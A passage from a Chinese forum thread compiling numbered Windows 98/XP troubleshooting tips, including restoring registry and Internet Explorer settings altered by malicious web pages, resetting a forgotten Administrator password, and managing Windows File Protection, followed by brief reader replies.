  根据这个道理,可以把Sysoc.inf文件中包含的“hide”全部删除,这样那些被隐藏的组件就都会在“添加/删除程序”中全部显示出来了。

一百零六、win98图标老乱套,与文件类型不配

1、在安全模式下运行grpconv(在Windonws目录下)试试;
2、在安全模式下删了ShellIconCache文件(在Windonws目录下,是隐藏文件)然后重启。
这是由于Windows的图标缓冲文件被破坏了,启动“资源管理器”程序,然后进入Windows系统文件夹,找到一个名为ShellIconCache的文件,并将它删除。再重新启动Windows,Windows就会重建图标缓冲文件,桌面上的图标就会恢复原状。由于这个文件是隐藏文件,所以大家可以通过Windows查找功能来找到它。当然我们也可以通过“文件夹选项”来显示隐藏文件,找到后将它删除。

一百零七、网页恶意代码的十一大危害及其解决方案

(一)如何在注册表被锁定的情况下修复注册表
注册表被锁定这一招是比较恶毒的,它使普遍用户即使会简单修改注册表使其恢复的条件下,困难又多了一层。症状是在开始菜单中点击“运行”,在运行框中输入regedit命令时,注册表不能够使用,并发现系统提示你没有权限运行该程序,然后让你联系系统管理员。
这是由于注册表编辑器:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册表的使用。
解决办法:
(1)可以自己动手制作一个解除注册表锁定的工具,就是用记事本编辑一个任意名字的.reg文件,比如recover.reg,内容如下:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

要特别注意的是:如果你用这个方法制作解除注册表锁定的工具,一定要严格按照上面的书写格式进行,不能遗漏更不能修改(其实你只需将上述内容“复制”、“粘贴”到你机器记事本中即可);完成上述工作后,点击记事本的文件菜单中的“另存为”项,文件名可以随意,但文件扩展名必须为.reg(切记),然后点击“保存”。这样一个注册表解锁工具就制作完成了,之后你只须双击生成的工具图标,其会提示你是否将这个信息添加进注册表,你要点击“是”,随后系统提示信息已成功输入注册表,再点击“确定”即可将注册表解锁了。
(2)也可以直接下载下面这个解锁工具,下载完成运行后可直接解锁注册表编辑器:
http://it.rising.com.cn/antivirus/net_virus/spiteful/enable.reg
(二)篡改IE的默认页
 
有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改了。具体说就是以下注册表项被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
 “Default_Page_URL”这个子键的键值即起始页的默认页。
  解决办法:
  运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了,或者将其设置为IE的默认值。

(三)修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改
 
主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"Settings"=dword:1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"Links"=dword:1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"SecAddSites"=dword:1
  解决办法:
  将上面这些DWORD值改为“0”即可恢复功能。
(四)IE的默认首页灰色按扭不可选
 
这是由于注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel
  下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改后为“1”(即为灰色不可选状态)。
  解决办法:
  将“homepage”的键值改为“0”即可。
(五)IE标题栏被修改

 
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
  具体说来受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
  解决办法:
  ①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
  ②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”等你喜欢的名字;
  ③同理,展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
  然后按②中所述方法处理。
  ④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题被解决了!
(六)IE右键菜单被修改
受到修改的注册表项目为:
 
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
  下被新建了网页的广告信息,并由此在IE右键菜单中出现!
  解决办法:
  打开注册标编辑器,找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
  删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也删除掉,这两个可是“正常”的,除非你不想在IE的右键菜单中见到它们。
(七)IE默认搜索引擎被修改
 
在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
  解决办法:
  运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。
(八)系统启动时弹出对话框

受到更改的注册表项目为:
 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
  在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的标题,“LegalNoticeText”是提示框的文本内容。由于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那些网页的广告信息!
  解决办法:
  打开注册表编辑器,找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
  这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。
(九)IE默认连接首页被修改
IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式,这是最常见的篡改手段,受害者众多。
 
 受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。
  解决办法:
  ①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
  ②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可;
  ③同理,展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
  在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。
  ④退出注册表编辑器,重新启动计算机,一切OK了!
  特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。
  解决办法:运行注册表编辑器regedit.exe,然后依次展开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
  主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页。
(十)IE中鼠标右键失效
浏览网页后在IE中鼠标右键失效,点击右键没有任何反应!
 
有的网络流氓为了达到其恶意宣传的目的,将你的右键弹出的功能菜单进行了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
??解决办法:
1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,删除相关的广告条文。
??2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,将其DWORD值"NoBrowserContextMenu"的值改为0。

(十一)查看“源文件”菜单被禁用
在IE窗口中点击“查看”→“源文件”,发现“源文件”菜单已经被禁用。
 
  恶意网页修改了注册表,具体的位置为:
  在注册表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
  下建立子键“Restrictions”,然后在“Restrictions”下面建立两个DWORD值:
“NoViewSource”和“NoBrowserContextMenu”,并为这两个DWORD值赋值为“1”。
  在注册表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
 下,将两个DWORD值:“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。
  通过上面这些键值的修改就达到了在IE中使鼠标右键失效,使“查看”菜单中的“源文件”被禁用的目的。
  解决办法:
  将以下内容另存为后缀名为.reg的注册表文件,比如说unlock.reg,双击unlock.reg导入注册表,不用重启电脑,重新运行IE就会发现IE的功能恢复正常了。
REGEDIT4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000

HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000

一百零八、找回Administrator账户密码

  问:我的WinXP安装在NTFS分区上。在使用故障修复控制台时,程序要求我输入Administrator的密码,可我已经不记得密码了(安装WinXP时,设置密码了)。请问有什么方法可以帮我找回密码吗?
  答:可以找回Administrator的密码。①若能正常进入WinXP,则使用具有管理员权限的账户登录WinXP,然后打开“控制面板→管理工具→计算机管理”(也可以在“运行”里输入compmgmt.msc打开计算机管理),在右边“计算机管理(本地)”的树形列表中选择“本地用户和组→用户”,在右边就可以看到当前系统里面存在的全部账户。用鼠标右键点击Administrator,选择设置密码,然后按照屏幕提示操作即可重新设置密码。②若无法正常进入WinXP,如果可以使用命令行安全模式,那么用具有管理权限的账户登录,使用NET USER命令修改密码,格式为“NET USER Administrator <输入你的新密码>”,然后回车即可。如果连命令行安全模式都无法进入,那么只有使用安装光盘选择修复了(用安装光盘启动系统,在安装程序选择菜单上选择“现在开始安装WinXP”,然后选择“修复”开始修复程序)。修复过程类似于Win98的覆盖安装,修复中会要求重新创建密码,而且已经安装的软件仍然可以继续使用。

一百零九、"文件保护"的解决方法

这可能是因为你先前删除了一些文件而导致的,只要在组策略中进行一下设置即可:单击“开始→运行”,输入“gpedit.msc”,然后依次展开“计算机配置→管理模板→系统→Windows文件保护”,然后双击“设置文件保护扫描”并将其设置为“禁用”即可。
我按以下步骤关闭文件保护
1、点击开始-->运行,键入regedt32并回车;
2、找到[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon];
3、在右侧的窗格中右键单击选择New-->DWORD Value,为其命名为SFCDisable;
4、在Hexadecimal项下输入键值为ffffff9d以关闭WFP;
5、重新启动系统使所做的更改生效
但是进行到第三步时就发现右侧的窗格里没有new这个选项,进行不下去了!
描述:
  该设置可以控制是否要系统开启文件保护功能即 (SFC) 它可以监视Windows的系统文件每当系统启动时候。我们可以修改注册表自由的控制文件的扫描参数。
操作:

打开你的“注册表编辑器”。然后找到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]这个子键。在右侧的窗口中创建一个“双字节值”并命名为“SFCScan”然后修改其值为 0 = 禁用, 1 = 启动时扫描, 2 = 扫描一次。
退出“注册表编辑器”注销或重新启动计算机,你会看到更改后的效果。
Windows XP和2000包括一种叫做WFP(Windows File Protection,Windows文件保护)的技术。把"SFCDisable"键的键值设置为"ffffff9d"可禁用WFP,而设置为"0"则可以启用它。其它一些可用的键值如下:
1 - 禁用,但是在系统启动的时候会询问你是否重新启用
2 - 只在下一次重启动的时候禁用,也不会询问你是否重新启用
4 - 启用,并且,不显示弹出窗口
ffffff9d - 完全禁用
还原受保护的Windows系统文件:在运行对话框中输入"Sfc /scannow"然后点击OK
用sfc /quiet把wfc屏蔽掉就Ok了
扫描工具SFC
  此工具会自动扫描所有受保护的系统文件,并用正确的版本取代不正确的版本。在操作系统部分损坏时,可以用来恢复系统。
  SFC的命令行及其各参数如下:
  SFC [/scannow] [/scanonce] [/scanboot] [/cancel] [/enable]
[/purgecache] [/cachesize=x] [/quiet]
  /SCANNOW:立即扫描所有设置保护的系统文件。
  /SCANONCE:下次开机时,只扫描一次所有设置保护的系统文件。
  /SCANBOOT:每次启动时,扫描所有设置保护的系统文件。
  /CANCEL:取消所有搁置中的设置保护系统文件的扫描。
  /QUIET:不提示用户,直接取代所有不正确的文件版本。
  /ENABLE:启用Windows文件保护,方便一般操作。
  /PURGECACHE:删除文件缓存,并立即扫描所有设有保护的文件系统。
  /CACHESIZE=x:设定文件缓存大小。

一百一十、双击无法打开文件夹

  问:我的电脑出了问题,在资源浏览器或者我的电脑里面无法打开文件夹,双击鼠标不是打开文件夹而是进入了搜索界面,请问这是为什么?
  答:可以修改注册表来恢复,进入注册表的HKEY_CLASSES_ROOT\Directory\shell,把find删除。还有一个方法就是点“文件夹”的“高级”选项里的“新建”,在“操作”里输入“OpenNew”,接着再在“用于执行操作的应用程序”里输入“Explorer %1”就行了。如果删除find,那不用配置。如果新建OpenNew,那还需把“Opennew”设为默认。

一百一十一、解决无法关机问题

1.点“开始→设置→控制面板→电源选项→高级电源管理”,如果你的机器支持高级电源管理功能,则选中“启用高级电源管理支持”;
  2.单击“开始”,并运行“regedit”,然后在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon中找到PowerdownAfterShutdown,并将值设为1;
  3.重启便可成功。
  说明:如果你的机器不支持高级电源管理,实则很不幸,只能在关闭系统显示出“现在可以安全关机”时,辛苦你手动切断电源了。

另:妙法解决Win98/Me不能关机
??Win 98和Win Me都存在这样的问题:当系统用上一段时间后,关闭系统时会停留在“现在可以正常关闭系统”这个画面,只有手动按下机箱的Power键才可把系统关闭。关于这个问题,很多报刊都曾经提供了相关的解决办法,概括起来有以下几种:安装微软的关机补丁、检查有没有打开高级电源选项、检查关机音效文件是否损坏。但经笔者多次实验证明,当出现这种情况时用这些方法均不一定奏效。
??笔者原来的解决方法是用Ghost将系统还原,后来摸索出了下面的方法,简单实用,现整理成文。
??1.新建一个文本文件,然后将此文件改名为“win386.swp”。在接下来的操作中就是要用这个0字节的“win386.swp”文件替换掉系统产生的“win386.swp”文件。
??2.依次按“开始→运行”,在“打开”对话框中输入“sfc”运行“系统文件检查器”,点选“从安装软盘提取一个文件”选项,按“浏览”按钮,把刚才新建的“win386.swp”文件选中,按“开始”按钮,此时会出现“文件提取”对话框,在“还原自”那里输入“win386.swp”文件所在的目录,如“C:\”,或者按右侧的“浏览”来选择;在“将文件保存到”那里直接输入“系统盘符\windows”(也可按右侧的“浏览”按钮选择);两处都填好后,按下“确定”按钮,便开始将新建的“win386.swp”文件替换系统本身的“win386.swp”文件。在这个过程中会出现“是否备份原先win386.swp文件”的提示,按“跳过”按钮即可。最后当弹出要求重启机器的对话框时按“是”,重启电脑后就可正常关机了。
??如果按照以上方法操作后故障没有排除,则请首先排除关机音效文件损坏等等因素。如果仍然不能解决,那么请在开机时按“F8”键,在启动菜单中选用“安全模式”启动,然后再重启一次系统就可以了。
??其实,如果对DOS熟练的朋友,也可以在纯DOS中删除“win386.swp”文件。即在关闭系统时选“重新启动系统并切换到MS-DOS方式”,将系统切换到纯DOS模式下,然后进入到“windows”目录,执行“del win386.swp”,最后重启电脑即可。

一百一十二、无法升级更新

  问:我的系统出了问题,无法安装微软的更新程序,提示“Setup could not verify the integrity of the file Update.inf. Make sure the Cryptographic service is running on this computer”等信息,请问我该如何解决这个问题?

  答:删除C:\Windows\System32\CATROOT2 文件夹,然后重新安装更新程序。

一百一十三、系统无法自动保存设置

  问:我用的是Windows 2000系统,以前我每次退出系统的时候,系统都会对我的一些设置作自动保存,可是现在不知道什么原因,我退出系统的时候不再自动保存设置了,请问我该如何恢复它的自动保存功能?

  答:打开注册表表编辑器,删除HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下面的NoSaveSettings键值,然后重启系统即可。

一百一十四、解决系统声音不正常

  问:我的电脑为什么在玩网络游戏如(疯狂坦克,轩辕剑)中间会没声音,有时声音自己会回来,有时一直没有,退出游戏电脑还是没声音,但是重启后声音又会有。我的电脑安装的是Windows 98,磐正845PE主板,集成AC'97声卡。

  答:请重新安装最新版本的声卡驱动和DirectX。由于集成的声卡是使用CPU来处理声音,当CPU高负荷运转时,就可能无法做出响应,导致没有声音。

一百一十五、解决系统托盘区的图标丢失

  现象:有时当某个程序出现非法操作后,系统托盘区的输入法图标、时间控制图标、音量控制图标都不见了。你无法判断现在的输入法是什么,甚至无法再调节音量,怎么办?

  解答:我们可以通过以下的方法“找回”这些图标:
  1.输入法图标:从“控制面板”下打开“输入法属性”窗口,在“输入法”标签页下勾选“启动任务栏上的指示器”复选项即可。
  2.音量控制图标:从“控制面板”中打开“声音和音频设备属性”窗口,然后勾选“将音量图标放入任务栏”复选框就行了。
  3.任务栏丢失:打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer下的StuckRects子键,将它删除后重新启动计算机就可以了。

一百一十六、系统无法自动保存设置

  问:我用的是Windows 2000系统,以前我每次退出系统的时候,系统都会对我的一些设置作自动保存,可是现在不知道什么原因,我退出系统的时候不再自动保存设置了,请问我该如何恢复它的自动保存功能?

  答:打开注册表表编辑器,删除HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下面的NoSaveSettings键值,然后重启系统即可。

一百一十七、解决系统资源不足问题

第一种思路:
  1.清除“剪贴板”
  当“剪贴板”中存放的是一幅图画或大段文本时,会占用较多内存。请清除“剪贴板”中的内容,释放它占用的系统资源:单击“开始”,指向“程序”,指向“附件”,指向“系统工具”,单击“剪贴板查看程序”,然后在“编辑”菜单上,单击“删除”命令。

  2.重新启动计算机
  只退出程序,并不重新启动计算机,程序可能无法将占用的资源归还给系统。请重新启动计算机以释放系统资源。

  3.减少自动运行的程序
  如果在启动Windows时自动运行的程序太多,那么,即使重新启动计算机,也将没有足够的系统资源用于运行其他程序。设置Windows不启动过多程序:其一,单击“开始→运行”,键入“msconfig”,单击“确定”按钮,单击“启动”选卡,清除不需要自启动的程序前的复选框。其二,单击“开始→运行”,键入“sysedit”,单击“确定”按钮,删除“autoexec.bat”、“win.ini”和“config.sys”文件中不必要的自启动的程序行。然后,重新启动计算机。

  4.设置虚拟内存
  虚拟内存不足也会造成系统运行错误.可以在“系统属性”对话框中手动配置虚拟内存,把虚拟内存的默认位置转到可用空间大的其他磁盘分区。

  5.应用程序存在Bug或毁坏
  有些应用程序设计上存在Bug或者已被毁坏,运行时就可能与Windows发生冲突或争夺资源,造成系统资源不足。解决方法有二:一是升级问题软件,二是将此软件卸载,改装其他同类软件。

  6.内存优化软件
  不少的内存优化软件,如RAM Idle和Memo Kit都能够自动清空“剪贴板”、释放被关闭程序未释放的系统资源、对虚拟内存文件(Win386.swp)进行重新组织等,免除手工操作的麻烦,达到自动释放系统资源的目的。

第二种思路:
  1.禁用一部分启动项
  启动时加载过多的应用程序会使Windows因系统资源严重不足而“蓝屏”,因此我们最好运行“Msconfig”禁用一部分应用程序。或者使用Windows优化大师来代劳。

  2.设置足够的虚拟内存
  虚拟内存不足也会造成系统多任务运算错误,我们可以通过时常删除一些临时文件和交换文件对此问题加以解决,此外还可以在“系统属性”下手动配置虚拟内存,把虚拟内存的默认位置转到其他逻辑盘下。并设置得大一些。

  3.给硬盘保留足够空间
  由于Win9X运行时需要用硬盘作虚拟内存,这就要求硬盘必须保留一定的自由空间以保证程序的正常运行。一般而言,最低应保证100MB以上的空间,否则出现“蓝屏”很可能与硬盘剩余空间太小有关。另外,硬盘的碎片太多,也容易导致“蓝屏”的出现。因此,每隔一段时间进行一次碎片整理是必要的。

  4.使用内存管理软件
  剩下的就是些杂项了,诸如不用activedesktop之类浪费资源的功能。使用内存管理软件,如RAM Idle之类的。养成好习惯,暂时不用的程序就将其关闭。


一百一十八、解决系统资源严重不足

关于概念:
系统资源(System Resource)和内在并不是同一个概念。
微软将Windows的系统资源(堆)分为五个堆,其中User资源堆为三个,而GDI资源堆为两个。
  三个User资源堆分别是:16位的用户堆(User Heap,64KB);32位的窗口堆(Windows Heap,2MB);32位的用户菜单堆(User Menu Heap,2MB)。
  两个GDI资源堆分别是:16位的GDI堆(GDI Heap,64KB);32位的GDI堆(GDI,2MB)。
  从这里的系统资源分类和大小我们应该明白,不管CPU是P4还是486,内存是8M还是1G,所有Windows的用户都拥有同样大小的系统资源(堆),用户不能自己增加或减少系统资源的大小,这是由操作系统决定的,与硬件档次没有任何关系。

问题原因:
在Windows中每运行一个程序,系统资源就会减少。有的程序会消耗大量的系统资源,即使把资源关闭,在内存中还是有一些没有的DLL文件在运行,这样就便得系统的运行速度下降,甚至出现上述问题。

解决办法:
我们可以通过修改注册表键值的方法,使关闭软件后自动清除内存中没用的DLL文件及时收回消耗的系统资源。打开注册表编辑器,找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer"为主键,在右过窗中单击右键,新建一个名这“AlwaysUnloadDII“的“字符串值“,然后将“AlwaysUnloadDII“的键值修改为“1“,退出注册表重新启动机器即可达到目的。

一百一十九、解决显示器花屏问题

  现象:一日正在CS大战,显示屏突然变得五颜六色,出现“花屏”现象,持续一段时间后键盘被锁死,只能Reset了。这种现象在第一次出现之后,就经常出现,有时候干脆就直接死机。

  解决:“花屏”现象是通过显示器表现出来的,但是导致花屏的罪魁祸首通常不是显示器。主要原因有以下两种:
  1.显卡松动,关机后拔下显卡重新安插通常就可以解决问题。
  2.系统过热,包括CPU温度过高和显卡芯片温度过高。可在机箱中相应位置安装散热风扇,或者将机箱放在通风良好的地方。

一百二十、解决限制使用应用程序问题

开机按F8进入安全模式选项,用带命令行提示的安全模式,在提示符后直接输入“mmc”(Microsoft管理控制台),操作步骤记录如下:
??首先在“文件”菜单下打开“添加/删除管理单元”(或直接用快捷键“Ctrl+M”),在出现的对话框中单击“添加”按钮,系统就会列出一大串可添加的管理单元,选定“组策略”,再单击“添加”,会出现“欢迎使用组策略向导”窗口,点“下一步”,最后单击“完成”。关闭可添加的管理单元的列表,然后在“添加/删除管理单元”对话框里点“确定”,你会发现在“控制台根节点”窗口的左侧“控制台根节点”项目下多了一个“本地计算机”,将它展开,下面的操作就跟你启用“限制使用应用程序”时一样了。只要把“只运行许可的Windows应用程序”里的“启用”改为“未配置”就行了。最后关闭“Microsoft管理控制台”,此时会跳出一个对话框,提示保存,点“确定”,若提示无法保存,不要理它,单击“否”,关闭即可。
??回到DOS命令窗口,按“Ctrl+Alt+Del”组合键,选择“关机”选项下的“重新启动”。回到正常状态下,所有的应用程序又都可以使用了。
级别: 光盘新手
发帖
55
飞翔币
335
威望
14
飞扬币
3270
信誉值
0
只看该作者 5 发表于: 2006-12-30
:)Y135 :)Y135 :)Y135
楼主辛苦了
怎么没有人顶
chl
级别: 光盘新手
发帖
49
飞翔币
335
威望
26
飞扬币
5648
信誉值
0
只看该作者 6 发表于: 2006-12-31
内容好丰富...支持楼主了.
级别: 光盘高级
发帖
1255
飞翔币
2
威望
1103
飞扬币
1659
信誉值
0
只看该作者 7 发表于: 2006-12-31
看完了 内容不少 谢谢